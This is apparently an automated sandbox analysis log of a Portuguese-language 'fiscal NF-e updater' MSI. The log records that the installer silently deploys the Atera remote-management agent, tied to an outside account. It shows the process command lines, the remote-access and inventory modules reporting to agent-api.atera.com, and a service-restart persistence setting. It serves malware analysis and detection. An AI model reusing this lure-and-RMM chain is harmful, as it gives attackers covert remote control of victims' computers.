Source: AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL);
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.0000025680298000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT MAX([Timestamp]) AS [TimeStamp] FROM [AlertsSent];
Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000024.00000002.2231925001.00007FFDF0FDA000.00000002.00000001.01000000.0000001C.sdmp, SQLite.Interop.dll.14.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: select Name from Win32_PerfFormattedData_Tcpip_NetworkInterface!DataStatsEnabled9InboundBandwidthStatsEnabled;OutboundBandwidthStatsEnabled
Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256806FE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT Id, IsActive, Timestamp, Name, Thresholds FROM ThresholdsProfiles ORDER BY Timestamp DESC LIMIT 1;

Source: Atualizador_Fiscal_NFe_37882912.msi

Static file information: TRID: Microsoft Windows Installer (60509/1) 57.88%

Source: Atualizador_Fiscal_NFe_37882912.msi

ReversingLabs: Detection: 23%

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Atualizador_Fiscal_NFe_37882912.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6CA4322E5D5FFDAF9B5BE54CEFF6E8EF
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIA89C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5744953 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIAB6C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5746140 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIC6C5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5752546 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6D26F14034A16EC2E7A017FE2C233455 E Global\MSI0000
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="contato@filosofiaclinicachapeco.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000Of2eLIAR" /AgentId="dfb304ca-1bde-49cc-a755-fa31deeb53c5"
Source: unknown	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIE7A0.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5760953 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "e2aff9ec-0443-4e2e-911d-1a87ff7f14f5" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "63f96359-1827-4d06-be75-18d92a7c1d16" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "d2b7b5a8-ee48-431a-b16e-4e13c856aa4f" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
Source: unknown	Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "b0110d28-0ca9-4cdd-bf48-816b1c3482b4" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k smphost
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "e532489e-e47a-4c00-92df-b85ef3f9c47f" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "e532489e-e47a-4c00-92df-b85ef3f9c47f" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "b7913a8a-f9c6-44d6-b153-cbae5eab311c" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "f40b3a64-d934-4445-96c6-2f766d5210eb" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "7e966fca-5db5-4899-b235-235f60debc02" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "f80e7fd7-093a-49ee-afe3-91d4df20447b" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "31ce45eb-a81e-4a65-8c03-ab37bcf781fe" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Process created: C:\Windows\System32\msiexec.exe "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "5070f66e-f4af-405a-83ec-4c6f4d61e8fc" agent-api.atera.com/Production 443 or8ixLi90Mf "heartbeat" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding DCE17E5D50B32609D0AF214981432641 E Global\MSI0000
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIEE25.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5828390 37 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIF48E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5829796 41 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6CA4322E5D5FFDAF9B5BE54CEFF6E8EF	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6D26F14034A16EC2E7A017FE2C233455 E Global\MSI0000	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="contato@filosofiaclinicachapeco.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000Of2eLIAR" /AgentId="dfb304ca-1bde-49cc-a755-fa31deeb53c5"	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding DCE17E5D50B32609D0AF214981432641 E Global\MSI0000	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIA89C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5744953 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIAB6C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5746140 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIC6C5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5752546 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIE7A0.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5760953 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent	Jump to behavior
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "e2aff9ec-0443-4e2e-911d-1a87ff7f14f5" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "63f96359-1827-4d06-be75-18d92a7c1d16" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "d2b7b5a8-ee48-431a-b16e-4e13c856aa4f" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "b0110d28-0ca9-4cdd-bf48-816b1c3482b4" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "e532489e-e47a-4c00-92df-b85ef3f9c47f" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "e532489e-e47a-4c00-92df-b85ef3f9c47f" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "b7913a8a-f9c6-44d6-b153-cbae5eab311c" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "f40b3a64-d934-4445-96c6-2f766d5210eb" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "7e966fca-5db5-4899-b235-235f60debc02" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "f80e7fd7-093a-49ee-afe3-91d4df20447b" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "31ce45eb-a81e-4a65-8c03-ab37bcf781fe" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "5070f66e-f4af-405a-83ec-4c6f4d61e8fc" agent-api.atera.com/Production 443 or8ixLi90Mf "heartbeat" 001Q300000Of2eLIAR
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
